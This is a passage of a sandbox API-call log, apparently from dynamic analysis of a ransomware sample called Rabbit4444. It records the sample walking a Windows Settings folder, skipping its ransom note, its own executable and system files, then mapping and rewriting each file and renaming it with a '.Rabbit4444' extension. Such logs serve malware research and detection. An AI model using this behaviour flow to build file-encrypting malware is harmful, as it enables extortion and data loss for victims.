returned 0x109370 [0056.473] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.473] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.473] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.473] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0056.473] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14778377695) returned 1 [0056.473] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0056.473] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0056.473] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.473] CloseHandle (hObject=0x298) returned 1 [0056.473] CloseHandle (hObject=0x278) returned 1 [0056.473] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsManage.settingcontent-ms.Rabbit4444") returned 176 [0056.473] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsManage.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageaccountsmanage.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsManage.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageaccountsmanage.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.474] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf68f4be3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf68f4be3, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageAccountsPicture.settingcontent-ms", cAlternateFileName="AA8DF2~1.SET")) returned 1 [0056.480] lstrcmpiW (lpString1="AAA_SettingsPageAccountsPicture.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.480] lstrcmpiW (lpString1="AAA_SettingsPageAccountsPicture.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.480] lstrcmpiW (lpString1="AAA_SettingsPageAccountsPicture.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.480] lstrcmpiW (lpString1="AAA_SettingsPageAccountsPicture.settingcontent-ms", lpString2=".") returned 1 [0056.480] lstrcmpiW (lpString1="AAA_SettingsPageAccountsPicture.settingcontent-ms", lpString2="..") returned 1 [0056.480] lstrcmpiW (lpString1="AAA_SettingsPageAccountsPicture.settingcontent-ms", lpString2="windows") returned -1 [0056.480] lstrcmpiW (lpString1="AAA_SettingsPageAccountsPicture.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.480] lstrcmpiW (lpString1="AAA_SettingsPageAccountsPicture.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.480] lstrcmpiW (lpString1="AAA_SettingsPageAccountsPicture.settingcontent-ms", lpString2="boot") returned -1 [0056.480] lstrcmpiW (lpString1="AAA_SettingsPageAccountsPicture.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.480] lstrcmpiW (lpString1="AAA_SettingsPageAccountsPicture.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.481] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageAccountsPicture.settingcontent-ms" | out: lpString1="AAA_SettingsPageAccountsPicture.settingcontent-ms") returned="AAA_SettingsPageAccountsPicture.settingcontent-ms" [0056.481] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsPicture.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.481] lstrlenW (lpString="AAA_SettingsPageAccountsPicture.settingcontent-ms") returned 49 [0056.481] lstrlenW (lpString="Rabbit4444") returned 10 [0056.481] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.481] lstrlenW (lpString=".dll") returned 4 [0056.481] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.481] lstrlenW (lpString=".lnk") returned 4 [0056.481] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.481] lstrlenW (lpString=".ini") returned 4 [0056.481] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.481] lstrlenW (lpString=".sys") returned 4 [0056.481] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.481] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsPicture.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageaccountspicture.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.481] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.481] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14779226665) returned 1 [0056.482] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1082) returned 1 [0056.482] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0056.482] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0056.482] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.483] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0056.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0056.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.484] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14779470079) returned 1 [0056.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0056.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0056.484] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.484] CloseHandle (hObject=0x298) returned 1 [0056.484] CloseHandle (hObject=0x278) returned 1 [0056.484] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsPicture.settingcontent-ms.Rabbit4444") returned 177 [0056.484] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsPicture.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageaccountspicture.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsPicture.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageaccountspicture.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.485] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6c15da3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf6c15da3, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageAccountsSync.settingcontent-ms", cAlternateFileName="AAB6AF~1.SET")) returned 1 [0056.485] lstrcmpiW (lpString1="AAA_SettingsPageAccountsSync.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.485] lstrcmpiW (lpString1="AAA_SettingsPageAccountsSync.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.485] lstrcmpiW (lpString1="AAA_SettingsPageAccountsSync.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.485] lstrcmpiW (lpString1="AAA_SettingsPageAccountsSync.settingcontent-ms", lpString2=".") returned 1 [0056.485] lstrcmpiW (lpString1="AAA_SettingsPageAccountsSync.settingcontent-ms", lpString2="..") returned 1 [0056.485] lstrcmpiW (lpString1="AAA_SettingsPageAccountsSync.settingcontent-ms", lpString2="windows") returned -1 [0056.485] lstrcmpiW (lpString1="AAA_SettingsPageAccountsSync.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.485] lstrcmpiW (lpString1="AAA_SettingsPageAccountsSync.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.485] lstrcmpiW (lpString1="AAA_SettingsPageAccountsSync.settingcontent-ms", lpString2="boot") returned -1 [0056.485] lstrcmpiW (lpString1="AAA_SettingsPageAccountsSync.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.485] lstrcmpiW (lpString1="AAA_SettingsPageAccountsSync.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.485] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageAccountsSync.settingcontent-ms" | out: lpString1="AAA_SettingsPageAccountsSync.settingcontent-ms") returned="AAA_SettingsPageAccountsSync.settingcontent-ms" [0056.485] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsSync.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.486] lstrlenW (lpString="AAA_SettingsPageAccountsSync.settingcontent-ms") returned 46 [0056.486] lstrlenW (lpString="Rabbit4444") returned 10 [0056.486] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.486] lstrlenW (lpString=".dll") returned 4 [0056.486] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.486] lstrlenW (lpString=".lnk") returned 4 [0056.486] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.486] lstrlenW (lpString=".ini") returned 4 [0056.486] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.486] lstrlenW (lpString=".sys") returned 4 [0056.486] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.486] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsSync.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageaccountssync.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.486] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.486] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14779701049) returned 1 [0056.486] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1067) returned 1 [0056.486] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0056.486] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0056.486] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.489] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0056.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0056.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0056.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0056.490] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14780111834) returned 1 [0056.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0056.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0056.490] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.491] CloseHandle (hObject=0x298) returned 1 [0056.491] CloseHandle (hObject=0x278) returned 1 [0056.491] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsSync.settingcontent-ms.Rabbit4444") returned 174 [0056.491] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsSync.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageaccountssync.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsSync.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageaccountssync.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.491] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6eeaa67, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf6eeaa67, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x430, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageAccountsUsers.settingcontent-ms", cAlternateFileName="AAF973~1.SET")) returned 1 [0056.492] lstrcmpiW (lpString1="AAA_SettingsPageAccountsUsers.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.492] lstrcmpiW (lpString1="AAA_SettingsPageAccountsUsers.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.492] lstrcmpiW (lpString1="AAA_SettingsPageAccountsUsers.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.492] lstrcmpiW (lpString1="AAA_SettingsPageAccountsUsers.settingcontent-ms", lpString2=".") returned 1 [0056.492] lstrcmpiW (lpString1="AAA_SettingsPageAccountsUsers.settingcontent-ms", lpString2="..") returned 1 [0056.492] lstrcmpiW (lpString1="AAA_SettingsPageAccountsUsers.settingcontent-ms", lpString2="windows") returned -1 [0056.492] lstrcmpiW (lpString1="AAA_SettingsPageAccountsUsers.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.492] lstrcmpiW (lpString1="AAA_SettingsPageAccountsUsers.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.492] lstrcmpiW (lpString1="AAA_SettingsPageAccountsUsers.settingcontent-ms", lpString2="boot") returned -1 [0056.492] lstrcmpiW (lpString1="AAA_SettingsPageAccountsUsers.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.492] lstrcmpiW (lpString1="AAA_SettingsPageAccountsUsers.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.492] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageAccountsUsers.settingcontent-ms" | out: lpString1="AAA_SettingsPageAccountsUsers.settingcontent-ms") returned="AAA_SettingsPageAccountsUsers.settingcontent-ms" [0056.492] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsUsers.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.492] lstrlenW (lpString="AAA_SettingsPageAccountsUsers.settingcontent-ms") returned 47 [0056.492] lstrlenW (lpString="Rabbit4444") returned 10 [0056.492] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.492] lstrlenW (lpString=".dll") returned 4 [0056.492] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.492] lstrlenW (lpString=".lnk") returned 4 [0056.492] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.492] lstrlenW (lpString=".ini") returned 4 [0056.492] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.492] lstrlenW (lpString=".sys") returned 4 [0056.492] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.493] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsUsers.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageaccountsusers.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.493] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.493] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14780353529) returned 1 [0056.493] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1072) returned 1 [0056.493] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0056.493] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0056.493] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.494] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.495] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.495] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.495] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.495] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.495] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.495] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.495] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.495] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.495] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14780611040) returned 1 [0056.495] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0056.495] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0056.495] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.496] CloseHandle (hObject=0x298) returned 1 [0056.496] CloseHandle (hObject=0x278) returned 1 [0056.496] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsUsers.settingcontent-ms.Rabbit4444") returned 175 [0056.496] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsUsers.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageaccountsusers.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsUsers.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageaccountsusers.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.496] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf70681e6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf70681e6, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x417, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageActivate.settingcontent-ms", cAlternateFileName="AAFE78~1.SET")) returned 1 [0056.496] lstrcmpiW (lpString1="AAA_SettingsPageActivate.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.496] lstrcmpiW (lpString1="AAA_SettingsPageActivate.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.496] lstrcmpiW (lpString1="AAA_SettingsPageActivate.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.497] lstrcmpiW (lpString1="AAA_SettingsPageActivate.settingcontent-ms", lpString2=".") returned 1 [0056.497] lstrcmpiW (lpString1="AAA_SettingsPageActivate.settingcontent-ms", lpString2="..") returned 1 [0056.497] lstrcmpiW (lpString1="AAA_SettingsPageActivate.settingcontent-ms", lpString2="windows") returned -1 [0056.497] lstrcmpiW (lpString1="AAA_SettingsPageActivate.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.497] lstrcmpiW (lpString1="AAA_SettingsPageActivate.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.497] lstrcmpiW (lpString1="AAA_SettingsPageActivate.settingcontent-ms", lpString2="boot") returned -1 [0056.497] lstrcmpiW (lpString1="AAA_SettingsPageActivate.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.497] lstrcmpiW (lpString1="AAA_SettingsPageActivate.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.497] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageActivate.settingcontent-ms" | out: lpString1="AAA_SettingsPageActivate.settingcontent-ms") returned="AAA_SettingsPageActivate.settingcontent-ms" [0056.497] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageActivate.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.497] lstrlenW (lpString="AAA_SettingsPageActivate.settingcontent-ms") returned 42 [0056.497] lstrlenW (lpString="Rabbit4444") returned 10 [0056.497] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.497] lstrlenW (lpString=".dll") returned 4 [0056.497] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.497] lstrlenW (lpString=".lnk") returned 4 [0056.497] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.497] lstrlenW (lpString=".ini") returned 4 [0056.497] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.497] lstrlenW (lpString=".sys") returned 4 [0056.497] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.497] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageActivate.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageactivate.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.498] 